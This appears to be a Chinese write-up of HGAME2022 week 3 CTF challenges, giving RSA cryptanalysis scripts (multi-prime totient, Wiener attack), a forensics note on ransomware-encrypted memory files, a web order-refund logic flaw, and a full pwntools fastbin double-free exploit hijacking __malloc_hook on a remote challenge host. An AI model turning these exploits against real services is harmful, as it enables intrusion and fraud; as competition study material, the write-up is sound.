HGAME2022 week3

0.前言

第三周的受苦。

1.CRYPTO

1-1.Block Cipher

不会。

1-2.Multi Prime RSA

这题主要是考欧拉函数求逆元。
task.py的源码如下：

from Crypto.Util.number import getPrime
from libnum import s2n
from secret import flag

p = getPrime(256)
q = getPrime(256)
r = getPrime(256)
s = getPrime(256)
n = p ** 2 * q ** 3 * r ** 5 * s ** 7
e = 65537
c = pow(s2n(flag), e, n)
print(f"p = {p}")
print(f"q = {q}")
print(f"r = {r}")
print(f"s = {s}")
print(f"n = {n}")
print(f"e = {e}")
print(f"c = {c}")

由n的推导可求出phi_n。
完整的脚本如下：

from primefac import *
from libnum import n2s

p=61789932148719477384027458333380568978056286136137829092952317307711908353477
q=91207969353355763685633284378833506319794714507027332929290701748727534193861
r=105471299607375388622347272479207944509670502835651250945203397530010861809367
s=83153238748903772448138307505579799277162652151244477391465130504267171881437
n=1039344372165087100001063920598151812324151064684841845250974758525265148567706103784958424873181721352440209284812493753972556519482026327282644619091466886523804841248277210353173383407944598453848113815866908595335619458549486958764490103808475329598085842184963065068499489886467911087295087163762599284622055185456905774507245781667293199205317692029829495961487347944813874415423771980660778986211145841712412631156369129146470119135136378158203459576596246169191419488560832734046076107673091995860021863239882608638458149930255944184863801278386551031980146460231515747754411678651752698881001464973981424240781413084941947261875289725538959720572496329348499870580057997540844488309111059240745081048324762866572948371222839278718034435739827677190025500802453626872356208612718417249649474571197167076916403582394186357812640566250930361276229969553128128312736245440129556020108188835966131425956431796417720436474093381770796431629523054378258497546013222494974549262140415585158985940966415459478150722832119691308697510189026447359189994055885090735411738332296254011208547676914004864732327863884217733456287369771087094514708468685641820375220835485053482570852619363091173324203334503461823983610886849930944250553928855506012684504211525542998575275626784129736345142772399109273619522445919
e=65537
c=844677395496466411520394190869787261209960246734415406217975986418865760680024542119231873259131861208878522030009923057991526761346423130242121884493257732067700857897379859545356609151834223804262174935191718271211809221730601602827122249238086030580971376104724987801049500689134122609834321586609223761140538079460830213824674361601046367637227094018381901291488659642720549583856812747877519600804325570421770575999289389175021646347371879234023647657507178519047236746071420327155188213839293382288787853777540226192644761028822256165706787395891134765908229036044468473519166141610604791485071702808854944672418124203289328124793348198048601338476086482318248264508789781967910205393740835345086784345145351367491197717933757414967811594913692588314161669333147733048171044386546892346475181197482702164468542430187885074163177843285948999943328049159021873821254267471067523609151007885131921896462161216356454116929796355815756642621369974260365378070336290542971599886325232821981080341858950609157813769416455337935096696635623426418166316737131174435618543058086342714723330814586496030805366321181723292731710369013923285787724941830672247377301048663929453294620044701627159066468762709113137517559435822623284148112827473010030736329596829357275518641576798298066541516764673029908084962144713

phi_n=(p**2-p**1)*(q**3-q**2)*(r**5-r**4)*(s**7-s**6)
d=modinv(e,phi_n)%phi_n
m=pow(c,d,n)

print(n2s(m))

运行可得到flag。

1-3.RSA Attack 3

经典wiener攻击。
task.py的源码如下：

from Crypto.Util.number import getPrime
from gmpy2 import invert
from libnum import s2n
from secret import flag

p = getPrime(2048)
q = getPrime(2048)
n = p * q
d = getPrime(64)
e = invert(d, (p - 1) * (q - 1))
c = pow(s2n(flag), e, n)
print(f"n = {n}")
print(f"e = {e}")
print(f"c = {c}")

从github下载的脚本经过一些修改可以破解出d：

import ContinuedFractions, Arithmetic, RSAvulnerableKeyGenerator
import sys

sys.setrecursionlimit(10000000)

def hack_RSA(e,n):
    '''
    Finds d knowing (e,n)
    applying the Wiener continued fraction attack
    '''
    frac = ContinuedFractions.rational_to_contfrac(e, n)
    convergents = ContinuedFractions.convergents_from_contfrac(frac)
    
    for (k,d) in convergents:
        
        #check if d is actually the key
        if k!=0 and (e*d-1)%k == 0:
            phi = (e*d-1)//k
            s = n - phi + 1
            # check if the equation x^2 - s*x + n = 0
            # has integer roots
            discr = s*s - 4*n
            if(discr>=0):
                t = Arithmetic.is_perfect_square(discr)
                if t!=-1 and (s+t)%2==0:
                    print("Hacked!")
                    return d

if __name__ == "__main__":
    e=77310199867448677782081572109343472783781135641712597643597122591443011229091533516758925238949755491395489408922437493670252550920826641442189683907973926843505436730014899918587477913032286153545247063493885982941194996251799882984145155733050069564485120660716110828110738784644223519725613280140006783618393995138076030616463398284819550627612102010214315235269945251741407899692274978642663650687157736417831290404871181902463904311095448368498432147292938825418930527188720696497596867575843476810225152659244529481480993843168383016583068747733118703000287423374094051895724494193455175131120243097065270804457787026492578916584536863548445813916819417857064037664101684455000184987531252344582899589746272173970083733130106407810619258077266603898529285634495710846838011858287024329514491058790557305041389614650730267774482954666726949886313386881066593946789460028399523245777171320319444673551268379126203862576627540177888290265714418064334752499940587750374552330008143708562065940245637685833371348603338834447212248648869514585047871442060412622164276894766238383894693759347590977926306581080390685360615407766600573527565016914830132066428454738135380178959590692145577418811677639050929791996313180297924833690095
    n=507419170088344932990702256911694788408493968749527614421614568612944144764889717229444020813658893362983714454159980719026366361318789415279417172858536381938870379267670180128174798344744371725609827872339512302232610590888649555446972990419313445687852636305518801236132032618350847705234643521557851434711389664130274468354405273873218264222293858509477860634889001898462547712800153111774564939279190835857445378261920532206352364005840238252284065587291779196975457288580812526597185332036342330147250312262816994625317482869849388424397437470502449815132000588425028055964432298176942124697105509057090546600330760364385753313923003549670107599757996810939165300581847068233156887269181096893089415302163770884312255957584660964506028002922164767453287973102961910781312351686488047510932997937700597992705557881172640175117476017503918294534205898046483981707558521558992058512940087192655700351675718815723840568640509355338482631416345193176708501897458649841539192993142790402734898948352382350766125000186026261167277014748183012844440603384989647664190074853086693408529737767147592432979469020671772152652865219092597717869942730499507426269170189547020660681363276871874469322437194397171763927907099922324375991793759
    print(hack_RSA(e,n))

之后按普通的RSA解即可：

d=13094612077654083919
n=507419170088344932990702256911694788408493968749527614421614568612944144764889717229444020813658893362983714454159980719026366361318789415279417172858536381938870379267670180128174798344744371725609827872339512302232610590888649555446972990419313445687852636305518801236132032618350847705234643521557851434711389664130274468354405273873218264222293858509477860634889001898462547712800153111774564939279190835857445378261920532206352364005840238252284065587291779196975457288580812526597185332036342330147250312262816994625317482869849388424397437470502449815132000588425028055964432298176942124697105509057090546600330760364385753313923003549670107599757996810939165300581847068233156887269181096893089415302163770884312255957584660964506028002922164767453287973102961910781312351686488047510932997937700597992705557881172640175117476017503918294534205898046483981707558521558992058512940087192655700351675718815723840568640509355338482631416345193176708501897458649841539192993142790402734898948352382350766125000186026261167277014748183012844440603384989647664190074853086693408529737767147592432979469020671772152652865219092597717869942730499507426269170189547020660681363276871874469322437194397171763927907099922324375991793759
c=165251729917394529793163344300848992394021337429474789711805041655116845722480301677817165053253655027459227404782607373107477419083333844871948673626672704233977397989843349633720167495862807995411682262559392496273163155214888276398332204954185252030616473235814999366132031184631541209554169938146205402400412307638567132128690379079483633171535375278689326189057930259534983374296873110199636558962144635514392282351103900375366360933088605794654279480277782805401749872568584335215630740265944133347038070337891035560658434763924576508969938866566235926587685108811154229747423410476421860059769485356567301897413767088823807510568561254627099309752215808220067495561412081320541540679503218232020279947159175547517811501280846596226165148013762293861131544331444165070186672186027410082671602892508739473724143698396105392623164025712124329254933353509384748403154342322725203183050328143736631333990445537119855865348221215277608372952942702104088940952142851523651639574409075484106857403651453121036577767672430612728022444370874223001778580387635197325043524719396707713385963432915855227152371800527536048555551237729690663544828830627192867570345853910196397851763591543484023134551876591248557980182981967782409054277224

m=pow(c,d,n)
'''def num2str(num):
    tmp=hex(num)[2:].replace("L","")
    if len(tmp)%2==0:
        return tmp.
'''
from libnum import *

print(n2s(m))

2.IoT

2-1.饭卡的UNO2.0

不会。

3.MISC

3-1.卡中毒

经典的内存取证，不难。
先查看内存镜像信息：

直接查找含flag的文件：

提取内存文件：

查看后发现一堆乱码：

搜索可疑的拓展名后发现这个文件被一种勒索病毒感染，所幸病毒作者公布了解密密钥，因此可以找到恢复的工具。
恢复后打开：

拿去解密即可得到flag。

3-2.谁不喜欢猫猫呢

像素点隐写，提取出来后就不会了（

4.PWN

4-1.changeable_note

考的是unlink，但是不会。

4-2.elder_note

简单常见的fastbin attack，经典的菜单题，libc很好心地给了2.23。
由于free函数释放堆块后未清空指针，因此存在UAF，又由于没有edit函数，因此考虑double free。
直接上exp：

#!/usr/bin/env python
# coding=utf-8
import hashlib
from pwn import *

context.log_level='debug'
libc=ELF('./libc-2.23.so')
#io=process('./note')
io=remote('chuj.top',52704)

io.recvuntil('sha256(????) == ')
s11=io.recv(64)

lib='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
m=''
key=''
for a in lib:
    for b in lib:
        for c in lib:
            for d in lib:
                m=a+b+c+d
                x=hashlib.sha256(str(m).encode('utf-8')).hexdigest()
                if x==s11:
                    key=m
                    break

#print(key)
io.sendlineafter('????>',key)

def choice(i):
    io.sendlineafter('>> ',str(i))
def add(index,size,content):
    choice(1)
    io.sendlineafter('>> ',str(index))
    io.sendlineafter('>> ',str(size))
    io.sendlineafter('>> ',content)
def show(index):
    choice(2)
    io.sendlineafter('>> ',str(index))
def delete(index):
    choice(3)
    io.sendlineafter('>> ',str(index))

add(0,0x100,'AAAA')
add(1,0x70,'AAAA')
delete(0)
show(0)
leak=u64(io.recv(6).ljust(8,b'\x00'))
log.info(hex(leak))
libc_base=leak-0x3c4b78
mlh=libc_base+libc.symbols['__malloc_hook']
realloc=libc_base+libc.symbols['realloc']
one=libc_base+0x4527a
fake_chunk=mlh-0x23

add(2,0x60,'AAAA')
add(3,0x60,'AAAA')
delete(2)
delete(3)
delete(2)
payload=p64(fake_chunk)
add(2,0x60,payload)
log.info(hex(fake_chunk))
#gdb.attach(io)
add(3,0x60,'AAAA')
add(4,0x60,'AAAA')
payload='A'*0xb+p64(one)+p64(realloc+2)
add(5,0x60,payload)
choice(1)
io.sendlineafter('>> ',str(6))
io.sendlineafter('>> ',str(1))

io.interactive()

4-3.sized_note

考的是offbyone，但不会（

5.REVERSE

5-1.Answer’s Windows

不会。

5-2.creakme3

不会。

5-3.hardened

不会。

5-4.fishman

不会。

6.WEB

6-1.SecurityCenter

不会。

6-2.Vidar shop demo

存在逻辑漏洞，删除订单即可返回钱。
因此考虑未支付删除订单，修改表单发包即可。

可以看到余额多了10000：

再下单购买一个10000元的flag即可。

6-3.LoginMe

不会。

赏

谢谢你请我吃糖果